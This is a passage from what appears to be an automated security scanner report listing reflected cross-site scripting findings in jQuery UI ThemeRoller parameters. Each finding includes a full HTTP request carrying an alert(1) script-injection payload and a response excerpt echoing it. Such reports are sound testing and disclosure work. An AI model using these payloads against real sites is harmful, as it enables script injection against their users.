t=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000
...[SNIP]...

2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc2"><script>alert(1)</script>ac4e48b54f7 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cad01"><script>alert(1)</script>9374f53a89e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b67c"><script>alert(1)</script>0674f60c158 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57884"><script>alert(1)</script>b65ac416221 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorH
...[SNIP]...

2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2586"><script>alert(1)</script>686e0674453 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
g&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada
...[SNIP]...

2.55. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8383"><script>alert(1)</script>069808b3d28 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58cc"><script>alert(1)</script>2f5ab107d8f was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8
...[SNIP]...

2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6081e"><script>alert(1)</script>c30c52ff5c6 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rd.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaa
...[SNIP]...

2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c1f"><script>alert(1)</script>bc465936fd5 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
